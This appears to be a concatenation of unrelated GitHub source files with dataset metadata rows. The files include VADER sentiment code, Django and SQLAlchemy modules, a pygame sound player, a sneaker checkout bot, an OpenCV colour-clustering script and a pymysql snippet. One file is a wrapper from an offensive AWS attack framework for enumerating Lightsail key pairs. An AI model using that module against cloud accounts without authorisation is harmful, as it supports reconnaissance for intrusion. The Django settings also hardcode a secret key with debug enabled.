                                           words_and_emoticons[i-2], words_and_emoticons[i-1])
        threetwo = "{0} {1}".format(words_and_emoticons[i-3], words_and_emoticons[i-2])
        sequences = [onezero, twoonezero, twoone, threetwoone, threetwo]
        for seq in sequences:
            if seq in SPECIAL_CASE_IDIOMS:
                valence = SPECIAL_CASE_IDIOMS[seq]
                break
        if len(words_and_emoticons)-1 > i:
            zeroone = "{0} {1}".format(words_and_emoticons[i], words_and_emoticons[i+1])
            if zeroone in SPECIAL_CASE_IDIOMS:
                valence = SPECIAL_CASE_IDIOMS[zeroone]
        if len(words_and_emoticons)-1 > i+1:
            zeroonetwo = "{0} {1} {2}".format(words_and_emoticons[i], words_and_emoticons[i+1], words_and_emoticons[i+2])
            if zeroonetwo in SPECIAL_CASE_IDIOMS:
                valence = SPECIAL_CASE_IDIOMS[zeroonetwo]
        # check for booster/dampener bi-grams such as 'sort of' or 'kind of'
        if threetwo in BOOSTER_DICT or twoone in BOOSTER_DICT:
            valence = valence+B_DECR
        return valence
    def _never_check(self, valence, words_and_emoticons, start_i, i):
        # "never so/this X" intensifies instead of negating; otherwise any
        # negation token in the look-back window scales the valence.
        if start_i == 0:
            if negated([words_and_emoticons[i-1]]):
                valence = valence*N_SCALAR
        if start_i == 1:
            if words_and_emoticons[i-2] == "never" and\
               (words_and_emoticons[i-1] == "so" or
                words_and_emoticons[i-1] == "this"):
                valence = valence*1.5
            elif negated([words_and_emoticons[i-(start_i+1)]]):
                valence = valence*N_SCALAR
        if start_i == 2:
            if words_and_emoticons[i-3] == "never" and \
               (words_and_emoticons[i-2] == "so" or words_and_emoticons[i-2] == "this") or \
               (words_and_emoticons[i-1] == "so" or words_and_emoticons[i-1] == "this"):
                valence = valence*1.25
            elif negated([words_and_emoticons[i-(start_i+1)]]):
                valence = valence*N_SCALAR
        return valence
    def _punctuation_emphasis(self, sum_s, text):
        # add emphasis from exclamation points and question marks
        ep_amplifier = self._amplify_ep(text)
        qm_amplifier = self._amplify_qm(text)
        punct_emph_amplifier = ep_amplifier+qm_amplifier
        return punct_emph_amplifier
    def _amplify_ep(self, text):
        # check for added emphasis resulting from exclamation points (up to 4 of them)
        ep_count = text.count("!")
        if ep_count > 4:
            ep_count = 4
        # (empirically derived mean sentiment intensity rating increase for
        # exclamation points)
        ep_amplifier = ep_count*0.292
        return ep_amplifier
    def _amplify_qm(self, text):
        # check for added emphasis resulting from question marks (2 or 3+)
        qm_count = text.count("?")
        qm_amplifier = 0
        if qm_count > 1:
            if qm_count <= 3:
                # (empirically derived mean sentiment intensity rating increase for
                # question marks)
                qm_amplifier = qm_count*0.18
            else:
                qm_amplifier = 0.96
        return qm_amplifier
    def _sift_sentiment_scores(self, sentiments):
        # want separate positive versus negative sentiment scores
        pos_sum = 0.0
        neg_sum = 0.0
        neu_count = 0
        for sentiment_score in sentiments:
            if sentiment_score > 0:
                pos_sum += (float(sentiment_score) +1) # compensates for neutral words that are counted as 1
            if sentiment_score < 0:
                neg_sum += (float(sentiment_score) -1) # when used with math.fabs(), compensates for neutrals
            if sentiment_score == 0:
                neu_count += 1
        return pos_sum, neg_sum, neu_count
    def score_valence(self, sentiments, text):
        # Fold the per-token valences into the final neg/neu/pos/compound
        # dictionary, adding punctuation emphasis to the dominant polarity.
        if sentiments:
            sum_s = float(sum(sentiments))
            # compute and add emphasis from punctuation in text
            punct_emph_amplifier = self._punctuation_emphasis(sum_s, text)
            if sum_s > 0:
                sum_s += punct_emph_amplifier
            elif sum_s < 0:
                sum_s -= punct_emph_amplifier
            compound = normalize(sum_s)
            # discriminate between positive, negative and neutral sentiment scores
            pos_sum, neg_sum, neu_count = self._sift_sentiment_scores(sentiments)
            if pos_sum > math.fabs(neg_sum):
                pos_sum += (punct_emph_amplifier)
            elif pos_sum < math.fabs(neg_sum):
                neg_sum -= (punct_emph_amplifier)
            total = pos_sum + math.fabs(neg_sum) + neu_count
            pos = math.fabs(pos_sum / total)
            neg = math.fabs(neg_sum / total)
            neu = math.fabs(neu_count / total)
        else:
            compound = 0.0
            pos = 0.0
            neg = 0.0
            neu = 0.0
        sentiment_dict = \
            {"neg" : round(neg, 3),
             "neu" : round(neu, 3),
             "pos" : round(pos, 3),
             "compound" : round(compound, 4)}
        return sentiment_dict
if __name__ == '__main__':
    # --- examples -------
    # Demo / smoke test. Requires vader_lexicon.txt beside this module; the
    # paragraph example below additionally needs the third-party nltk package.
    sentences = ["VADER is smart, handsome, and funny.", # positive sentence example
                 "VADER is not smart, handsome, nor funny.", # negation sentence example
                 "VADER is smart, handsome, and funny!", # punctuation emphasis handled correctly (sentiment intensity adjusted)
                 "VADER is very smart, handsome, and funny.", # booster words handled correctly (sentiment intensity adjusted)
                 "VADER is VERY SMART, handsome, and FUNNY.", # emphasis for ALLCAPS handled
                 "VADER is VERY SMART, handsome, and FUNNY!!!",# combination of signals - VADER appropriately adjusts intensity
                 "VADER is VERY SMART, uber handsome, and FRIGGIN FUNNY!!!",# booster words & punctuation make this close to ceiling for score
                 "The book was good.", # positive sentence
                 "The book was kind of good.", # qualified positive sentence is handled correctly (intensity adjusted)
                 "The plot was good, but the characters are uncompelling and the dialog is not great.", # mixed negation sentence
                 "At least it isn't a horrible book.", # negated negative sentence with contraction
                 "Make sure you :) or :D today!", # emoticons handled
                 "Today SUX!", # negative slang with capitalization emphasis
                 "Today only kinda sux! But I'll get by, lol" # mixed sentiment example with slang and constrastive conjunction "but"
                 ]
    analyzer = SentimentIntensityAnalyzer()
    print("----------------------------------------------------")
    print(" - Analyze typical example cases, including handling of:")
    print(" -- negations")
    print(" -- punctuation emphasis & punctuation flooding")
    print(" -- word-shape as emphasis (capitalization difference)")
    print(" -- degree modifiers (intensifiers such as 'very' and dampeners such as 'kind of')")
    print(" -- slang words as modifiers such as 'uber' or 'friggin' or 'kinda'")
    print(" -- contrastive conjunction 'but' indicating a shift in sentiment; sentiment of later text is dominant")
    print(" -- use of contractions as negations")
    print(" -- sentiment laden emoticons such as :) and :D")
    print(" -- sentiment laden slang words (e.g., 'sux')")
    print(" -- sentiment laden initialisms and acronyms (for example: 'lol') \n")
    for sentence in sentences:
        vs = analyzer.polarity_scores(sentence)
        print("{:-<65} {}".format(sentence, str(vs)))
    print("----------------------------------------------------")
    print(" - About the scoring: ")
    print(""" -- The 'compound' score is computed by summing the valence scores of each word in the lexicon, adjusted
     according to the rules, and then normalized to be between -1 (most extreme negative) and +1 (most extreme positive).
     This is the most useful metric if you want a single unidimensional measure of sentiment for a given sentence.
     Calling it a 'normalized, weighted composite score' is accurate.""")
    print(""" -- The 'pos', 'neu', and 'neg' scores are ratios for proportions of text that fall in each category (so these
     should all add up to be 1... or close to it with float operation). These are the most useful metrics if
     you want multidimensional measures of sentiment for a given sentence.""")
    print("----------------------------------------------------")
    tricky_sentences = ["Sentiment analysis has never been good.",
                        "Sentiment analysis has never been this good!",
                        "Most automated sentiment analysis tools are shit.",
                        "With VADER, sentiment analysis is the shit!",
                        "Other sentiment analysis tools can be quite bad.",
                        "On the other hand, VADER is quite bad ass!",
                        "Roger Dodger is one of the most compelling variations on this theme.",
                        "Roger Dodger is one of the least compelling variations on this theme.",
                        "Roger Dodger is at least compelling as a variation on the theme."
                        ]
    print("----------------------------------------------------")
    print(" - Analyze examples of tricky sentences that cause trouble to other sentiment analysis tools.")
    print(" -- special case idioms - e.g., 'never good' vs 'never this good', or 'bad' vs 'bad ass'.")
    print(" -- special uses of 'least' as negation versus comparison \n")
    for sentence in tricky_sentences:
        vs = analyzer.polarity_scores(sentence)
        print("{:-<69} {}".format(sentence, str(vs)))
    print("----------------------------------------------------")
    print("----------------------------------------------------")
    print(" - VADER works best when analysis is done at the sentence level (but it can work on single words or entire novels).")
    paragraph = "It was one of the worst movies I've seen, despite good reviews. Unbelievably bad acting!! Poor direction. VERY poor production. The movie was bad. Very bad movie. VERY BAD movie!"
    print(" -- For example, given the following paragraph text from a hypothetical movie review:\n\t'{}'".format(paragraph))
    print(" -- You could use NLTK to break the paragraph into sentence tokens for VADER, then average the results for the paragraph like this: \n")
    # simple example to tokenize paragraph into sentences for VADER
    from nltk import tokenize
    sentence_list = tokenize.sent_tokenize(paragraph)
    paragraphSentiments=0.0
    for sentence in sentence_list:
        vs = analyzer.polarity_scores(sentence)
        print("{:-<69} {}".format(sentence, str(vs["compound"])))
        paragraphSentiments += vs["compound"]
    print("AVERAGE SENTIMENT FOR PARAGRAPH: \t" + str(round(paragraphSentiments/len(sentence_list), 4)))
    print("----------------------------------------------------")
| [
"noreply@github.com"
] | JeongWonJo.noreply@github.com |
021676a563b8c2aaac34f7d2d9a6da9dfee4e013 | c10e381828be393b9d7d8ae72a75b00949de2437 | /globals/models/base.py | 6bc11f36125b802d2f32d939c69d841b953b2b8b | [
"BSD-2-Clause"
] | permissive | procool/mygw | afcdb4b2ef3be6f38f8a28a4505d2e088912f5eb | f35b72b5915d314e883dcde45c3c33ff26f173df | refs/heads/master | 2021-01-10T04:40:12.083642 | 2003-01-17T10:30:00 | 2003-01-17T10:30:00 | 48,728,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import MetaData
Base = declarative_base()
metadata = MetaData()
# Cache of resolved model classes, keyed by the "package.ClassName" string.
loaded_models = {
}
## get model, e.g: "users.Users": "users/sa_model.py" with class: "Users"
def get_model(model_):
    """Resolve and memoize the model class named by ``model_``.

    ``model_`` has the form ``"<package>.<ClassName>"``; the class is
    imported from ``<this package>/<package>/sa_model.py`` and cached in
    ``loaded_models`` so later lookups are plain dictionary hits.
    """
    if model_ in loaded_models:
        return loaded_models[model_]
    # Dotted path of the sa_model module: "<our parent pkg>.<pkg>.sa_model".
    current = __name__.split(".")
    path_ = current[0:-1]
    model = model_.split(".")
    path_ += (model[0], 'sa_model')
    ## Get module MODULE/sa_model:
    # __import__ returns the top-level package; walk down to the leaf module.
    mod = __import__(".".join(path_))
    for i in path_[1:]:
        mod = getattr(mod, i)
    ## Get model by module attr:
    cls_ = getattr(mod, model[1])
    # (Historical note: a new SA subclass of (model, Base) was once built
    # here; the plain class is now used directly.)
    loaded_models[model_] = cls_
    # Return the class directly instead of recursing back into the cache
    # we just populated (the old `return get_model(model_)` re-entered the
    # function for no benefit).
    return cls_
| [
"procool@procool.ru"
] | procool@procool.ru |
0f57aed3e7ad16725c7f7040d0eba97700db9dc9 | 92e5fa96b12944857366ed356eae2ffa1f778ddc | /zero_blog/urls.py | 38cd40f59ac1fd8d4054d709d2c7fde78958f03e | [] | no_license | vividlier/blog | a107675687b5519f8c38b2baa8af42ed93581955 | f1ba9f2a9e237049036c69e7725e0b9d518f756e | refs/heads/master | 2021-05-11T08:53:10.777947 | 2018-01-23T06:59:41 | 2018-01-23T06:59:41 | 118,065,527 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,176 | py | # -*- coding:utf-8 -*-
"""zero_blog URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.urls import path
from django.conf.urls import include,url
from django.contrib import admin
from django.conf import settings
from blog.uploads import upload_image
# Route table: TinyMCE-style image upload + Django admin + the blog app
# (which owns the site root via its own urls module).
urlpatterns = [
    # url(r"^uploads/(?P<path>.*)$", \
    # "django.views.static.serve", \
    # {"document_root": settings.MEDIA_ROOT, }),
    # Image-upload endpoint used from the admin; dir_name selects the
    # destination subdirectory.
    url(r'^admin/upload/(?P<dir_name>[^/]+)$', upload_image, name='upload_image'),
    url(r'^admin/', admin.site.urls),
    # Catch-all: delegate everything else to the blog app's URLconf.
    url(r'^', include('blog.urls', namespace='blog')),
]
| [
"786410317@qq.com"
] | 786410317@qq.com |
3f3fb632bea88ffa2e488c584544669d6e396c19 | f7328c45c872b69c3b7c2a2bf563257f51e5fbff | /src/sound.py | 02015b9b715fb2938284ce88bb0d22e84a8a2496 | [
"MIT"
] | permissive | whoji/banjiu_2048 | ffc45ff9e0b65cccea2b3cc6e91b233db9f7ae79 | d99522f2f0f6d159b5ecb49d023ee06da5f0f5a5 | refs/heads/master | 2020-04-21T04:01:06.870805 | 2019-02-10T09:09:31 | 2019-02-10T09:09:31 | 169,301,201 | 0 | 0 | null | 2019-02-07T03:58:40 | 2019-02-05T19:42:21 | Python | UTF-8 | Python | false | false | 2,088 | py | import pygame
from flags import F
class SoundPlayer(object):
    """Loads the game's sound effects and plays them via pygame.mixer."""
    def __init__(self, pygame):
        # The pygame module is injected so the player uses the caller's
        # already-initialized mixer.
        self.pygame = pygame
        self.__load_sound()
        # Guards one-shot jingles (menu / game over / finish) from
        # re-triggering on every frame while the same screen is shown.
        # NOTE(review): never reset to False, so each jingle plays at most
        # once per SoundPlayer instance -- confirm intended.
        self.is_playing = False
    def __load_sound(self):
        # Map effect name -> loaded Sound; paths are rooted at F.proj_path.
        self.sounds = {
            'move' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_1.wav'),
            'merge' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_2.wav'),
            'castle' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_3.wav'),
            'main_menu' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/sfx_sounds_powerup2.wav'),
            'game_over' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
            'game_finish' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
        }
        # Quieter defaults for the loud effects.
        self.sounds['move'].set_volume(0.3)
        self.sounds['main_menu'].set_volume(0.5)
        self.sounds['game_over'].set_volume(0.3)
        self.sounds['game_finish'].set_volume(0.3)
    def play_sound_effect(self, event, game_status):
        # game_status: 1 = main menu, 4 = game over, 6 = game finished
        # (per the inline comments); any other value means in-game, where
        # the `event` flags select which effect to play.
        if game_status == 1: # main menu
            if not self.is_playing:
                self.sounds['main_menu'].play()
                self.is_playing = True
            return
        elif game_status == 4:
            if not self.is_playing:
                self.sounds['game_over'].play()
                self.is_playing = True
            return
        elif game_status == 6:
            if not self.is_playing:
                self.sounds['game_finish'].play()
                self.is_playing = True
            return
        else:
            if event[2]: # upgrade
                self.sounds['castle'].play()
                return
            if event[3]: # cancelled_list is not empty
                self.sounds['castle'].play()
                return
            #elif event[1]:
            # self.sounds['merge'].play()
            #elif event[0]:
            # self.sounds['move'].play()
    def play_action_sound(self):
        # Played directly on every player move.
        self.sounds['move'].play()
| [
"minli1985@gmail.com"
] | minli1985@gmail.com |
a76b4bd5db57d7d3f6e4f183973cdbe0b2485ff0 | 700c7801958dd4789caf94785b5dc8c5e3daa4fd | /ttp/lightsail_enum_keypairs.py | b60a67c5e6315a9d9da0f5817af2698ca230cd17 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | blackbotsecurity/AWS-Attack | 24d4cd6ebda067e9672f4f963d414a7b176e3551 | ad4668ab60173aabce3c6b9c7685160be5e3f14d | refs/heads/master | 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #!/usr/bin/env python3
import datetime
#'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
import argparse
from botocore.exceptions import ClientError
import importlib
target = ''
# Module metadata consumed by the AWS-Attack framework: technique id,
# involved AWS services, and MITRE-style description/intent fields.
technique_info = {
    'blackbot_id': 'T1526.b.001',
    'external_id': '',
    'controller': 'lightsail_enum_keypairs',
    'services': ['Lightsail'],
    'external_dependencies': [],
    'arguments_to_autocomplete': [],
    'version': '1',
    'aws_namespaces': [],
    'last_updated_by': 'Blackbot, Inc. Sun Sep 20 04:13:33 UTC 2020' ,
    'ttp_exec': '',
    'ttp_mitigation': '',
    'ttp_detection': '',
    'intent': 'Captures common data associated with Lightsail',
    'name': 'Cloud Service Discovery: Lightsail' ,
}
# Argument parser for this controller; add_help is disabled because the
# framework supplies its own help handling.
parser = argparse.ArgumentParser(add_help=False, description=technique_info['name'])
def main(args, awsattack_main):
    """Parse CLI args, (re)load the src implementation, and delegate to it."""
    parsed = parser.parse_args(args)
    src_module = __import__(
        'ttp.src.lightsail_enum_keypairs_src',
        globals(), locals(), ['technique_info'], 0)
    # Reload so repeated invocations pick up on-disk changes to the src file.
    importlib.reload(src_module)
    awsattack_main.chain = True
    return src_module.main(parsed, awsattack_main)
def summary(data, awsattack_main):
    """Render the enumeration results as a human-readable report.

    Side effect: removes the 'regions' key from ``data``.
    """
    lines = [' Regions Enumerated:\n']
    lines.extend(' {}\n'.format(region) for region in data['regions'])
    del data['regions']
    for field, count in data.items():
        lines.append(' {} {} enumerated\n'.format(count, field[:-1] + '(s)'))
    return ''.join(lines)
| [
"github.nk@blackbot.io"
] | github.nk@blackbot.io |
40b9b4e12b21edda18047af4cfccf7dc4badd5e2 | 11195b96533b1d2a9d24ef41b928a6f0803086b8 | /env/bin/pip3 | 1e9d110ceb7029f455c97c28678e8c18a58c720d | [] | no_license | Zak652/blog_project | a234b8dd41ae530dbf7bf0495acc37abaa786b54 | e540345aeb8ca89cbc75851d3dcd108a1cdedb20 | refs/heads/master | 2021-08-24T07:50:30.346942 | 2017-12-08T18:13:46 | 2017-12-08T18:13:46 | 112,940,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | #!/home/zak/school/projects/blog/env/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
    # Strip the "-script.pyw" / ".exe" suffix that setuptools adds to
    # console-script wrappers on Windows so pip sees a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"m2kzak@gmail.com"
] | m2kzak@gmail.com | |
05f6d934deeeb2713eabf5a69493098199c22a84 | 74a87d4593680e997ad6d8932911060094b4846b | /project/settings.py | 53bddffcad577ca63b5076f34a655448a7a76027 | [] | no_license | jeremiasbittencourt/CadUs | 742f86686a1c54f97efbf65dcaba75a8ab27d50a | d948a6dd3ffaec32bae3a1d9ad5755c47f4386c0 | refs/heads/main | 2023-04-01T01:03:08.872795 | 2021-04-10T11:52:30 | 2021-04-10T11:52:30 | 356,567,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,363 | py | """
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import django_heroku
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-u_#j=#53!v4@z_&wnq)2_fo7*#nx#-d*x_d3)q03d_7)e-k9e1'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# NOTE(review): empty ALLOWED_HOSTS is only usable while DEBUG=True;
# django_heroku.settings() below may populate it -- confirm for production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'app'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
# (SQLite for local development; django_heroku swaps in DATABASE_URL.)
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = Path.joinpath(BASE_DIR, 'static_collected')
# Apply Heroku-specific overrides (database, static files, logging) on top
# of the settings defined above.
django_heroku.settings(locals())
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
"jeremiasbittencourt2013@gmail.com"
] | jeremiasbittencourt2013@gmail.com |
c25b162a552a368dede859e7374213e344fb9f6c | 65b5a70eea4c21fbd751666c2516aff1a9e5162c | /kithBot.py | ea28594ffbf3f16818509643d1cb855a3317207f | [] | no_license | dlsstanford/Walbot | 098764e6b778c23ee7bf279293aabf450239ccb0 | 527f1afd854b4f02bd44ecc6b834e95426c1d115 | refs/heads/master | 2023-02-08T23:16:39.603592 | 2020-12-29T21:20:58 | 2020-12-29T21:20:58 | 296,972,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,192 | py | #!/usr/bin/python3
from splinter import Browser
import textwrap
import bs4
import requests
import json
class KithBot:
    """Automates a kith.com checkout via requests/BeautifulSoup scraping
    and a Splinter-driven Chrome browser: find product -> add to cart ->
    fill shipping -> fill payment."""
    def __init__(self, **info):
        # Site endpoints plus user-supplied product/shipping/payment data.
        self.base_url = "https://kith.com/"
        self.shop_ext = "collections/"
        self.checkout_ext = "checkout/"
        self.info = info
    def init_browser(self):
        # Launch a Chrome-backed Splinter session (requires chromedriver).
        self.b = Browser('chrome')
    def find_product(self):
        # Scrape the collection page and store the matching product URL in
        # self.final_link.
        try:
            r = requests.get("{}{}{}".format(
                self.base_url, self.shop_ext, self.info["category"])).text
            soup = bs4.BeautifulSoup(r, 'lxml')
            temp_tuple = []
            temp_link = []
            # Each product card contributes (href, title, colorway).
            for link in soup.find_all("a", class_="product-card__link"):
                temp_tuple.append((link["href"], link.contents[1].text, link.contents[3].text))
            for i in temp_tuple:
                if i[1] == self.info["product"] and i[2] == self.info["color"]:
                    temp_link.append(i[0])
            # Keep only hrefs that matched exactly once, then take the first.
            self.final_link = list(
                set([x for x in temp_link if temp_link.count(x) == 1]))[0]
            print(self.final_link)
        except requests.ConnectionError as e:
            print("Failed to open url")
    def visit_site(self):
        # Open the product page, pick the size, add to cart, go to checkout.
        # NOTE(review): the size is interpolated unquoted into the XPath
        # (e.g. @data-value=12) -- confirm this matches the page markup.
        size = '//div[@data-value='+ self.info["size"] + ']'
        self.b.visit("{}{}".format(self.base_url, str(self.final_link)))
        self.b.find_by_xpath(size).click()
        self.b.find_by_name('add').click()
        self.b.find_by_name('checkout').click()
    def shipping_func(self):
        # Fill the Shopify checkout contact + shipping-address form.
        self.b.fill("checkout[email]", self.info["emailfield"])
        self.b.fill("checkout[shipping_address][first_name]", self.info["firstName"])
        self.b.fill("checkout[shipping_address][last_name]", self.info["lastName"])
        self.b.fill("checkout[shipping_address][address1]", self.info["addressfield"])
        self.b.fill("checkout[shipping_address][city]", self.info["city"])
        self.b.fill("checkout[shipping_address][zip]", self.info["zip"])
        self.b.fill("checkout[shipping_address][phone]", self.info["phonefield"])
        # Advance through the shipping-method and payment steps.
        self.b.find_by_id('continue_button').click()
        self.b.find_by_id('continue_button').click()
    def checkout_func(self):
        # The card fields live in separate iframes; locate each by position.
        id0 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[0]['id']
        with self.b.get_iframe(id0) as iframe:
            # Card number is typed in 4-digit groups to mimic manual entry.
            num = textwrap.wrap(self.info["number"], 4)
            iframe.find_by_name("number").type(num[0])
            iframe.find_by_name("number").type(num[1])
            iframe.find_by_name("number").type(num[2])
            iframe.find_by_name("number").type(num[3])
        id1 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[1]['id']
        with self.b.get_iframe(id1):
            self.b.fill("name", self.info["nameField"])
        id2 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[2]['id']
        with self.b.get_iframe(id2) as iframe:
            # Expiry ("MMYY") is typed as MM then YY.
            num = textwrap.wrap(self.info["expiry"], 2)
            iframe.find_by_name("expiry").type(num[0])
            iframe.find_by_name("expiry").type(num[1])
        id3 = self.b.find_by_xpath("//iframe[@class='card-fields-iframe']")[3]['id']
        with self.b.get_iframe(id3):
            self.b.fill("verification_value", self.info["ccv"])
        # self.b.find_by_id('continue_button').click()
    def main(self):
        # End-to-end flow: browser -> product -> cart -> shipping -> payment.
        self.init_browser()
        self.find_product()
        self.visit_site()
        self.shipping_func()
        self.checkout_func()
if __name__ == "__main__":
    # Example configuration. All personal/payment values below are
    # placeholders and must be replaced before a real run.
    INFO = {
        "driver": "geckodriver",
        "product": "Clarks Desert Boot",
        "color": "Chocolate",
        "size": "12",
        "category": "mens-footwear",
        "firstName": "John",
        "lastName": "Smith",
        "nameField": "John Smith",
        "emailfield": "example@example.com",
        "phonefield": "6780870522",
        "addressfield": "example road",
        "city": "example",
        "zip": "30106",
        "country": "GB",
        "card": "visa",
        "number": "1234123412341234",
        "month": "09",
        "year": "2020",
        "expiry": "0920",
        "ccv": "123"
    }
    bot = KithBot(**INFO)
    bot.main()
| [
"desmon.stanford@keysight.com"
] | desmon.stanford@keysight.com |
4e48c33398ffe0b53232e3744f4314679faeb2f9 | f8330920cf0136849f850810511860e01de348b2 | /main.py | 7d427691a5dc67938fecd7b5f42504bb8b2b8763 | [] | no_license | trjoma/Determination-of-dominant-colors | bc4356fa27e036b3934b7ab85cc1f5f33bb03748 | f41b2c1586ad39458de6939bf797ca15f9c3db6d | refs/heads/main | 2023-01-06T01:19:04.615405 | 2020-10-27T07:22:57 | 2020-10-27T07:22:57 | 307,617,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,348 | py | import numpy as np
import cv2
from matplotlib import pyplot as plt
K = 5 #number of colors
img = cv2.imread('b2.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
Z = img.reshape((-1, 3))
# convert to np.float32
Z = np.float32(Z)
# define criteria and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
ret, label, center = cv2.kmeans(Z, K, None, criteria, 10,
cv2.KMEANS_RANDOM_CENTERS)
# Now separate the data, Note the flatten()
center = np.uint8(center)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
clr = []
for k in range(len(center)):
clr.append("#{:02x}{:02x}{:02x}".format(center[k][0], center[k][1],
center[k][2]))
print('Used colors:')
for c in range(len(clr)):
print(f' {clr[c]}')
inp = list(np.unique(list(label), return_counts=True))
outp = []
bars = []
height = []
for i in range(K):
bars.append(inp[0][i])
height.append(inp[1][i])
y_pos = np.arange(len(bars))
plt.subplot(121), plt.imshow(res2) # 'img' or 'res2'
plt.title('Image'), plt.xticks([]), plt.yticks([])
plt.subplot(122), plt.pie(
height, labels=clr, colors=clr, autopct='%.1f%%', startangle=90)
plt.title('Dominant colors'), plt.xticks([]), plt.yticks([])
plt.show()
cv2.waitKey(0)
#cv2.destroyAllWindows()
| [
"noreply@github.com"
] | trjoma.noreply@github.com |
cd719227705450db0c8e01e80f0fa6aff6cc3063 | 42de721fb3eebdb0260edf24fe0c20db6169b2f2 | /connetdb/dome4.py | 8c46fd9f866e92a92f85f7dfec53e98907858736 | [] | no_license | devile-xiang/-_python_spider | 56f3a4cff2fb69493c9887b0c62434a6989052f5 | b45d470ec54b79bc91e2ecfcc852c7c23f52848d | refs/heads/master | 2020-07-29T20:39:45.835950 | 2019-09-21T09:18:38 | 2019-09-21T09:18:38 | 209,951,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | #encoding:utf-8
import pymysql
#写法要规范
conn=pymysql.connect(host='localhost',user='root',password='root',
database='pymysql_dome',port=3306)
cursor=conn.cursor()
#删除数据
# sql="""delete from user where id=%s """
#修改数据
sql="""update user set username=%s where id=%s """
username='新名字'
id=2
cursor.execute(sql,(username,id))
#提交到数据库执行
conn.commit()
conn.close() | [
"2904633401@.qq.com"
] | 2904633401@.qq.com |
